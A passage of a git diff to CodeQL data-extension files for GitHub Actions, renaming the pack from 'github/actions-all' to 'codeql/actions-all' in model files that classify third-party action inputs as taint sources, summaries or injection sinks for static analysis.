+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml
index 4b0c810d2304..85631268af72 100644
--- a/ql/lib/ext/manual/magefile_mage-action.model.yml
+++ b/ql/lib/ext/manual/magefile_mage-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml
index acdf3ead4a41..18dbcab6f539 100644
--- a/ql/lib/ext/manual/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/manual/maierj_fastlane-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
index b138d59c57ef..5c3b4b82bc22 100644
--- a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml
index 63b236f32add..d86870f2f152 100644
--- a/ql/lib/ext/manual/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/manual/marocchino_on_artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
index 9d0ecf04c6b8..06b1f3afd5d6 100644
--- a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
+++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/martinhaintz/ga-file-list
diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml
index 0c6debc5d5e4..1d0e33bb277d 100644
--- a/ql/lib/ext/manual/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/manual/mattdavis0351_actions.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
 - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
index b72bd69e6255..f08bf9ac6e0d 100644
--- a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
index fec2376377e0..4e0800281d20 100644
--- a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
index 3201ac370b48..4ea7e022cbdb 100644
--- a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml
index 35aecbdd9681..b16fa3c545b8 100644
--- a/ql/lib/ext/manual/mikefarah_yq.model.yml
+++ b/ql/lib/ext/manual/mikefarah_yq.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
index 59c6e39515e6..09a9673ee896 100644
--- a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
index 06371eebae21..d3b34019844a 100644
--- a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml
index a12a478d9bd9..59cf5d2cf025 100644
--- a/ql/lib/ext/manual/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/manual/msys2_setup-msys2.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
index 28357d5f4689..4664937e6bc4 100644
--- a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
index cfdff1898aee..28dd99378bf5 100644
--- a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
index f4ad5f7292b4..7ca3034593bf 100644
--- a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml
index 872b4e243d71..8af1107d6864 100644
--- a/ql/lib/ext/manual/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/manual/nanasess_setup-php.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml
index bd53ab3d65a2..86c0bb7ccfb9 100644
--- a/ql/lib/ext/manual/nick-fields_retry.model.yml
+++ b/ql/lib/ext/manual/nick-fields_retry.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml
index db650eeb7c76..df140b9e570a 100644
--- a/ql/lib/ext/manual/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/manual/octokit_graphql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml
index 34d63f31ca86..f0f684aa4caa 100644
--- a/ql/lib/ext/manual/octokit_request-action.model.yml
+++ b/ql/lib/ext/manual/octokit_request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
index 02d6d804699a..8149f79fa641 100644
--- a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
index 46fb5fd7dd6d..4f2b95eac61e 100644
--- a/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
index d1d930168dc8..8abafc6ae7d0 100644
--- a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
+++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"]
diff --git a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
index 0aab8b946328..f0dcfa3ea4ef 100644
--- a/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
index 62bb26ba1ff5..2268d00d332a 100644
--- a/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
+++ b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
index 14bd9a7875ac..ab55b9b62144 100644
--- a/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
+++ b/ql/lib/ext/manual/peter-murray_issue-forms-body-parser.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-forms-body-parser", "*", "output.payload", "text", "manual"]
diff --git a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
index dfacbbc14f46..1ec53228c169 100644
--- a/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
index 0acee71af263..97564731d2cd 100644
--- a/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
+++ b/ql/lib/ext/manual/potiuk_get-workflow-origin.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["potiuk/get-workflow-origin", "*", "output.sourceHeadBranch", "branch", "manual"]
diff --git a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
index b258b619b6c5..b43c13276573 100644
--- a/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml
index 76b0c1d7d32c..d9edf347c335 100644
--- a/ql/lib/ext/manual/py-actions_flake8.model.yml
+++ b/ql/lib/ext/manual/py-actions_flake8.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
index 587519e948b5..ce637b1b0c52 100644
--- a/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml
index 58cbf9cc7423..95d63525c575 100644
--- a/ql/lib/ext/manual/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/manual/pyo3_maturin-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
index cc39018b9b1f..d89f4582f67b 100644
--- a/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml
index 3d92eaef263a..27130231df9c 100644
--- a/ql/lib/ext/manual/read-file-actions.model.yml
+++ b/ql/lib/ext/manual/read-file-actions.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"]
diff --git a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
index a0b5bc0dee41..9157cec03dd0 100644
--- a/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
+++ b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
index 89d91208ad46..359c3b0e2225 100644
--- a/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml
index 5b2e5d9c4eb5..8534ccc599a3 100644
--- a/ql/lib/ext/manual/release-kit_regex.model.yml
+++ b/ql/lib/ext/manual/release-kit_regex.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml
index 65a4cc606528..136e4aa9e418 100644
--- a/ql/lib/ext/manual/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/manual/renovatebot_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
index 281602cf0c73..428115a7bd71 100644
--- a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
+++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/Rishabh510/Path-lister-action
diff --git a/ql/lib/ext/manual/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml
index d82962aa0969..be313c017115 100644
--- a/ql/lib/ext/manual/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/manual/roots_issue-closer-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
index 32622271d6a3..74e55a9bf4e2 100644
--- a/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
+++ b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml
index 8dbc5ee2aded..785616390b39 100644
--- a/ql/lib/ext/manual/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/manual/ruby_setup-ruby.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
index 0bbd6364b5e0..06de2990adf6 100644
--- a/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml
index 6d6ec4a393e5..a2ca3eae7844 100644
--- a/ql/lib/ext/manual/sergeysova_jq-action.model.yml
+++ b/ql/lib/ext/manual/sergeysova_jq-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
index 78737c6bb8bd..962c7431b758 100644
--- a/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
+++ b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
index 64d5aac33ab8..ebe62b37a6fd 100644
--- a/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
+++ b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
index c921df3fa7d0..64d8ec1b7a58 100644
--- a/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
+++ b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml
index 623483db63ec..49ba12d47a24 100644
--- a/ql/lib/ext/manual/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/manual/snow-actions_eclint.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
index 5184c3c4c48c..396c480c4cdc 100644
--- a/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml
index c898d41c8387..129c8beb0202 100644
--- a/ql/lib/ext/manual/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/manual/step-security_harden-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
index d7c874c77870..343c0efe42aa 100644
--- a/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
index 7daafbc2fd81..6ca3eb0c1607 100644
--- a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
+++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/the-coding-turtle/ga-file-list
diff --git a/ql/lib/ext/manual/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml
index 398dfb5c766c..956c9afc8e40 100644
--- a/ql/lib/ext/manual/tibdex_backport.model.yml
+++ b/ql/lib/ext/manual/tibdex_backport.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
index a0dfb648875e..e49643d1f155 100644
--- a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
